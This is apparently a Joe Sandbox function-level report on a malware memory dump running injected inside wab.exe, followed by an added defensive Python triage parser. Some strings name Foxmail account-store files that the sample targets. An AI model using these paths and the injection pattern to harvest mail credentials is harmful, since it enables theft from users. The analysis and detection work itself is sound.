                    • lstrcatW.KERNEL32(?,?), ref: 21361038
                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2136104B
                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21361061
                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21361075
                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21361090
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 213610B8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$AttributesFilelstrcat
                    • String ID:
                    • API String ID: 3594823470-0
                    • Opcode ID: edd107b8031da6aa33b7a90d22479c82784797f472cd2795bc2c91c69c6e0cc1
                    • Instruction ID: 5b9081654d99a7d95f72754298d3cb6df94334ea32c0634eabeb801d8a488513
                    • Opcode Fuzzy Hash: edd107b8031da6aa33b7a90d22479c82784797f472cd2795bc2c91c69c6e0cc1
                    • Instruction Fuzzy Hash: 8121A135E00399ABCF60DB65DC48EDB377EEFC4318F104296E959931A5DA309A85CB84
                    APIs
                    • GetLastError.KERNEL32(?,?,21363518,213623F1,21361F17), ref: 21363864
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 21363872
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2136388B
                    • SetLastError.KERNEL32(00000000,?,21363518,213623F1,21361F17), ref: 213638DD
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 8cc3b11ad725e9da2ce81c3cb01d06624bfa190ed2b707b58f8fb65b54cfd185
                    • Instruction ID: cea06a156b77a2acd7d2be6bc939ec331997ea8e7c895329745684fb707deeed
                    • Opcode Fuzzy Hash: 8cc3b11ad725e9da2ce81c3cb01d06624bfa190ed2b707b58f8fb65b54cfd185
                    • Instruction Fuzzy Hash: 6E01FC3368D7925DA303167E6C849972F5FEB5777C7200239E139950E9FF654805434C
                    APIs
                    • GetLastError.KERNEL32(?,?,21366C6C), ref: 21365AFA
                    • _free.LIBCMT ref: 21365B2D
                    • _free.LIBCMT ref: 21365B55
                    • SetLastError.KERNEL32(00000000,?,?,21366C6C), ref: 21365B62
                    • SetLastError.KERNEL32(00000000,?,?,21366C6C), ref: 21365B6E
                    • _abort.LIBCMT ref: 21365B74
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: 90e5907a85356f55b994112e1d68a65cd7930ce5124c55e845c5f0c51136cf0c
                    • Instruction ID: d32bcc3aeafd228b60018d44472a72a56d7be7fb68035d90c5dc19229c1a68c5
                    • Opcode Fuzzy Hash: 90e5907a85356f55b994112e1d68a65cd7930ce5124c55e845c5f0c51136cf0c
                    • Instruction Fuzzy Hash: 7FF0A4335855C2AED70326396C08E4A2A6F8FE26F9B240134FB1597198FE3985024A6C
                    APIs
                      • Part of subcall function 21361E89: lstrlenW.KERNEL32(?,?,?,?,?,213610DF,?,?,?,00000000), ref: 21361E9A
                      • Part of subcall function 21361E89: lstrcatW.KERNEL32(?,?), ref: 21361EAC
                      • Part of subcall function 21361E89: lstrlenW.KERNEL32(?,?,213610DF,?,?,?,00000000), ref: 21361EB3
                      • Part of subcall function 21361E89: lstrlenW.KERNEL32(?,?,213610DF,?,?,?,00000000), ref: 21361EC8
                      • Part of subcall function 21361E89: lstrcatW.KERNEL32(?,213610DF), ref: 21361ED3
                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2136122A
                      • Part of subcall function 2136173A: _strlen.LIBCMT ref: 21361855
                      • Part of subcall function 2136173A: _strlen.LIBCMT ref: 21361869
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                    • API String ID: 4036392271-1520055953
                    • Opcode ID: b4d5897ed1471f63b6e2c256d28c1e1d4565697b80f22a79ee0af9d205b10860
                    • Instruction ID: d9d81df04abdd4b3698c1adc79bc4ecfb48decce0e4ad2f02d01f2a942273934
                    • Opcode Fuzzy Hash: b4d5897ed1471f63b6e2c256d28c1e1d4565697b80f22a79ee0af9d205b10860
                    • Instruction Fuzzy Hash: BA2195B9E102486AEB1097D4DC81FED733EEF90718F000556F604EB2D8E6B15D81875D
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21364AEA,?,?,21364A8A,?,21372238,0000000C,21364BBD,00000000,00000000), ref: 21364B59
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21364B6C
                    • FreeLibrary.KERNEL32(00000000,?,?,?,21364AEA,?,?,21364A8A,?,21372238,0000000C,21364BBD,00000000,00000000,?,21362082), ref: 21364B8F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                     • String ID: CorExitProcess$mscoree.dll (MSVC CRT exit path that checks for a loaded .NET runtime before ExitProcess; CRT boilerplate, not sample-specific logic)
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: e7904f7dc910b43ae7327d0ed407de648d8eb8cbdb906023ff37072b81d41e60
                    • Instruction ID: 521b0754a94943091c184bff47d7a92fd060df111a3272b85e7df3156f848c37
                    • Opcode Fuzzy Hash: e7904f7dc910b43ae7327d0ed407de648d8eb8cbdb906023ff37072b81d41e60
                    • Instruction Fuzzy Hash: 33F0C231940188BFDB029F92C808F9EBFBFEF09365F000168F945A3258DB768941CB98
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 2136715C
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2136717F
                      • Part of subcall function 213656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21365702
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 213671A5
                    • _free.LIBCMT ref: 213671B8
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 213671C7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: f363ea10d478804f68a0ff62fc8b2e41f92ebd6bb61e2aea349d2cd23c78132c
                    • Instruction ID: ff0157ccc728627a7f32c92c863df6b4aa2710dd18b68aab53ade0789430cb41
                    • Opcode Fuzzy Hash: f363ea10d478804f68a0ff62fc8b2e41f92ebd6bb61e2aea349d2cd23c78132c
                    • Instruction Fuzzy Hash: 41017572605295BF23120FBB5C4CD7B6E6FDAC3AA8350016EFE04C7208DA658C0181B8
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000000,2136636D,21365713,00000000,?,21362249,?,?,21361D66,00000000,?,?,00000000), ref: 21365B7F
                    • _free.LIBCMT ref: 21365BB4
                    • _free.LIBCMT ref: 21365BDB
                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21365BE8
                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21365BF1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: bcfcf4643e2c51d83b23c66435423c6943fca72f50bf6c828cd60c9926c1bf92
                    • Instruction ID: daf8647dbec7c50c82b0c2433dbb3d27ef3d5008490e7ec9a463e2f21c66fa5f
                    • Opcode Fuzzy Hash: bcfcf4643e2c51d83b23c66435423c6943fca72f50bf6c828cd60c9926c1bf92
                    • Instruction Fuzzy Hash: E801F4731846C2ABD30316791C88D0B2A6F9BD36FC7200038FB16D715AEE7989024A6C
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,?,?,213610DF,?,?,?,00000000), ref: 21361E9A
                    • lstrcatW.KERNEL32(?,?), ref: 21361EAC
                    • lstrlenW.KERNEL32(?,?,213610DF,?,?,?,00000000), ref: 21361EB3
                    • lstrlenW.KERNEL32(?,?,213610DF,?,?,?,00000000), ref: 21361EC8
                    • lstrcatW.KERNEL32(?,213610DF), ref: 21361ED3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$lstrcat
                    • String ID:
                    • API String ID: 493641738-0
                    • Opcode ID: 200aab66f17c319235b6eb610497be9bf09d8d7f950d34d9b2773f1a8b771fbe
                    • Instruction ID: 51f0ab50252c0bc8907bf02892f9484607566df40cefe73545ef6abf6e8a8590
                    • Opcode Fuzzy Hash: 200aab66f17c319235b6eb610497be9bf09d8d7f950d34d9b2773f1a8b771fbe
                    • Instruction Fuzzy Hash: D4F082265402107AE7222B6BAC85EBF7B7DEFC6B64B04001DFA0C83190DB59984293B9
                    APIs
                    • _free.LIBCMT ref: 213691D0
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 213691E2
                    • _free.LIBCMT ref: 213691F4
                    • _free.LIBCMT ref: 21369206
                    • _free.LIBCMT ref: 21369218
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 8ff8e53b2a2052b980ae40ad978129af0c1def8b688239b53a75e75cc8680e7b
                    • Instruction ID: 1ca55e9da87763e746e160658a5ab7b9f1b7f961a049b3bb551194516ca5f128
                    • Opcode Fuzzy Hash: 8ff8e53b2a2052b980ae40ad978129af0c1def8b688239b53a75e75cc8680e7b
                    • Instruction Fuzzy Hash: A8F0AF725842C9DFC624CF58D5C5C16BFDFEB11368324080DEA08C7808DA38F8808B68
                    APIs
                    • _free.LIBCMT ref: 2136536F
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 21365381
                    • _free.LIBCMT ref: 21365394
                    • _free.LIBCMT ref: 213653A5
                    • _free.LIBCMT ref: 213653B6
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: beedc5cc822f54a4088d257cbc51ff0235e6596f12e41762370d1e5a62c5c591
                    • Instruction ID: eaf754312bafc6d2ea2eb17eb2e271bd0c7a19f7ed24498e94ded3633d53780d
                    • Opcode Fuzzy Hash: beedc5cc822f54a4088d257cbc51ff0235e6596f12e41762370d1e5a62c5c591
                    • Instruction Fuzzy Hash: 8CF01D72DD4156DBC6135F28998040A3FBFA715BB8305011EE95097658F73D14139F89
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 21364C1D
                    • _free.LIBCMT ref: 21364CE8
                    • _free.LIBCMT ref: 21364CF2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$FileModuleName
                     • String ID: C:\Program Files (x86)\windows mail\wab.exe (GetModuleFileNameA is called with hModule NULL, so this is the host process image: the dumped module is running injected inside wab.exe)
                    • API String ID: 2506810119-3377118234
                    • Opcode ID: 2c7b96e90c9c000fbdeddafe3e537728393665b569f5e5bba242e0b3e7800892
                    • Instruction ID: ed438009b61a819ab5cebdb67f2cd0e135109f2d3aae55078aadf7bf209f3ce7
                    • Opcode Fuzzy Hash: 2c7b96e90c9c000fbdeddafe3e537728393665b569f5e5bba242e0b3e7800892
                    • Instruction Fuzzy Hash: BE31B5B1E40299BFDB12CF998880D9EBFFEEB95768F10406AE9049730CD6758A41CB54
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,21366FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 21368731
                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 213687BA
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 213687CC
                    • __freea.LIBCMT ref: 213687D5
                      • Part of subcall function 213656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21365702
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                    • String ID:
                    • API String ID: 2652629310-0
                    • Opcode ID: d211879ef90f655a983a8d236a824f5a3cdbf093d639ff10256ee9225f366e4f
                    • Instruction ID: 2bc4761ff3d37e16b8ccc163d7c0fd970ec32f64c38a5141900064dd25de10b0
                    • Opcode Fuzzy Hash: d211879ef90f655a983a8d236a824f5a3cdbf093d639ff10256ee9225f366e4f
                    • Instruction Fuzzy Hash: AD31B232A0029A9FDF258F65CC84DAF7BAEEB45318F0101B8ED04D7154E739D961CB94
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21361D66,00000000,00000000,?,21365C88,21361D66,00000000,00000000,00000000,?,21365E85,00000006,FlsSetValue), ref: 21365D13
                    • GetLastError.KERNEL32(?,21365C88,21361D66,00000000,00000000,00000000,?,21365E85,00000006,FlsSetValue,2136E190,FlsSetValue,00000000,00000364,?,21365BC8), ref: 21365D1F
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21365C88,21361D66,00000000,00000000,00000000,?,21365E85,00000006,FlsSetValue,2136E190,FlsSetValue,00000000), ref: 21365D2D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 79fc23d752f429b826244501ae13096a5452e6c597c3dcfb467a291511a5fd0e
                    • Instruction ID: 190b755acd09205365eaf05dbdf391dda868dc8d6099a416f24a751b1f33745d
                    • Opcode Fuzzy Hash: 79fc23d752f429b826244501ae13096a5452e6c597c3dcfb467a291511a5fd0e
                    • Instruction Fuzzy Hash: 810147332412A6ABC3124E2A8C4CE467B9EAF126E57100630FB0AD7185D725C802CBE8
                    APIs
                    • _free.LIBCMT ref: 2136655C
                      • Part of subcall function 213662BC: IsProcessorFeaturePresent.KERNEL32(00000017,213662AB,00000000,?,?,?,?,00000016,?,?,213662B8,00000000,00000000,00000000,00000000,00000000), ref: 213662BE
                      • Part of subcall function 213662BC: GetCurrentProcess.KERNEL32(C0000417), ref: 213662E0
                       • Part of subcall function 213662BC: TerminateProcess.KERNEL32(00000000), ref: 213662E7 (0x17 is PF_FASTFAIL_AVAILABLE and C0000417 is STATUS_INVALID_CRUNTIME_PARAMETER: this is the CRT invalid-parameter/fast-fail handler, not sample-specific logic)
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                    • String ID: *?$.
                    • API String ID: 2667617558-3972193922
                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                    • Instruction ID: dd489772a172a961f82f9db88979815ca614086ac153363b87cc09cd62de8f99
                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                    • Instruction Fuzzy Hash: A551D6B1E0024ADFDB05CFA8C880AADBBFEEF49358F24416DD554E7308E6359A01CB94
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: : $Se.
                    • API String ID: 4218353326-4089948878
                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                    • Instruction ID: 653d8e09926cd89c282baf39ed8e39dcbc32be720bdcbaca3a4acc81ae00a528
                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                    • Instruction Fuzzy Hash: B811E3B1D00289AECB11CFACD840BDEFBFDAF1A318F10405AE645E7216E6745B02C769
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 21362903
                      • Part of subcall function 213635D2: RaiseException.KERNEL32(?,?,?,21362925,00000000,00000000,00000000,?,?,?,?,?,21362925,?,213721B8), ref: 21363632
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 21362920
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: Unknown exception
                    • API String ID: 3476068407-410509341
                    • Opcode ID: 7d7b8b4e841d3b56fb9afb1aa3dccce4d1e6d389bab3222acf07301f9ffa8ea9
                    • Instruction ID: b747834f801db2728e19205b0e9d92decc39da0aabd1a4f3620294383d01fa24
                    • Opcode Fuzzy Hash: 7d7b8b4e841d3b56fb9afb1aa3dccce4d1e6d389bab3222acf07301f9ffa8ea9
                    • Instruction Fuzzy Hash: 14F02D3490024DBB8B00A6A9EC44D5D3B6F7F1135CB514134FA249249CEF31E926C5DC
                    APIs
                    • GetOEMCP.KERNEL32(00000000,?,?,21366C7C,?), ref: 21366A1E
                    • GetACP.KERNEL32(00000000,?,?,21366C7C,?), ref: 21366A35
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                     • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                     • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID:
                     • String ID: |l6! (not a real string: these are the little-endian bytes of 0x21366C7C, the address passed as the fourth argument in the GetOEMCP/GetACP calls above, misread as text)
                    • API String ID: 0-2215998295
                    • Opcode ID: eec3e325bedc8e759db5b460ae880d3125a1f31e107e7bd486d8a3e54a2f9f1d
                    • Instruction ID: cdf3fb6d92fa66f4164418287fab6001de92dd584c98384266e9175533aabae6
                    • Opcode Fuzzy Hash: eec3e325bedc8e759db5b460ae880d3125a1f31e107e7bd486d8a3e54a2f9f1d
                    • Instruction Fuzzy Hash: 68F0C2B0480189CFE702CF69C84876D377EFB013B9F544348E4788A1D9EB75494ACB89
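Added triage helper, written for this page and not part of Joe Sandbox or of the analysed sample: it parses per-function records in the format listed above from a constructed, abridged sample, flags String ID entries that name mail-client account stores (the two Foxmail files seen in the first record) and decodes 4-byte "strings" that are really little-endian pointers into the dumped module, as with the `|l6!` entry. The module base 0x21360000 is the Offset shown in the records; the 0x20000 size bound and the marker list are assumptions of the example.

```python
import re
import struct
from dataclasses import dataclass, field

# Constructed sample: three per-function records in the format of the listing
# above, abridged to the lines this parser uses. Not sandbox output.
SAMPLE = r"""APIs
• lstrlenW.KERNEL32(?,?,?,?,?,213610DF,?,?,?,00000000), ref: 21361E9A
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2136122A
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
APIs
• GetOEMCP.KERNEL32(00000000,?,?,21366C7C,?), ref: 21366A1E
• GetACP.KERNEL32(00000000,?,?,21366C7C,?), ref: 21366A35
Similarity
• API ID:
• String ID: |l6!
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 21364C1D
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Program Files (x86)\windows mail\wab.exe
"""

# Mail-client account-store fragments to flag (both are Foxmail account files).
# The list itself is an assumption of this example; extend it as needed.
MAIL_STORE_MARKERS = (r"\Accounts\Account.rec0", r"\Data\AccCfg\Accounts.tdat")

# "<api>.<module>(" or "<api>.<lib> ref:" at the start of a bullet, optionally
# prefixed by the "Part of subcall function XXXX:" marker.
CALL_RE = re.compile(r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([\w@]+)[.(]")
REF_RE = re.compile(r"ref:\s*([0-9A-Fa-f]{8})")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)             # API names, listing order
    refs: list = field(default_factory=list)             # call-site addresses
    strings: list = field(default_factory=list)          # String ID entries
    mail_store_hits: list = field(default_factory=list)
    pointer_strings: list = field(default_factory=list)  # (text, decoded address)


def parse_records(text):
    """Split the listing on 'APIs' headings; collect each record's API calls,
    call-site addresses and the '$'-joined String ID entries."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if body.startswith("String ID:"):
            value = body[len("String ID:"):].strip()
            current.strings = [s for s in value.split("$") if s]
            continue
        call = CALL_RE.match(body)
        if call:
            current.apis.append(call.group(1))
            ref = REF_RE.search(body)
            if ref:
                current.refs.append(int(ref.group(1), 16))
    return records


def decode_pointer_string(s, base, size):
    """Return the address a 4-character 'string' encodes (little-endian) when
    it lies in [base, base + size); else None. Such entries are usually a
    saved return address or pointer that the string scanner misread as text."""
    if len(s) != 4:
        return None
    try:
        raw = s.encode("latin-1")
    except UnicodeEncodeError:
        return None
    addr = struct.unpack("<I", raw)[0]
    return addr if base <= addr < base + size else None


def triage(text, module_base, module_size):
    """Parse the listing and annotate each record with account-store hits and
    pointer-like strings."""
    records = parse_records(text)
    for rec in records:
        rec.mail_store_hits = [s for s in rec.strings
                               if any(m in s for m in MAIL_STORE_MARKERS)]
        for s in rec.strings:
            addr = decode_pointer_string(s, module_base, module_size)
            if addr is not None:
                rec.pointer_strings.append((s, addr))
    return records


if __name__ == "__main__":
    # Base is the dump 'Offset' from the records; 0x20000 is an assumed size bound.
    for i, rec in enumerate(triage(SAMPLE, 0x21360000, 0x20000)):
        print(i, rec.apis, rec.mail_store_hits,
              [(s, hex(a)) for s, a in rec.pointer_strings])
```

Run it over the full per-function listing to get the credential-store functions and their call sites in one pass, and to discard pointer-shaped "strings" before they end up in a YARA rule.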

                    Execution Graph

                    Execution Coverage:6.3%
                    Dynamic/Decrypted Code Coverage:9.2%
                    Signature Coverage:1.5%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:80
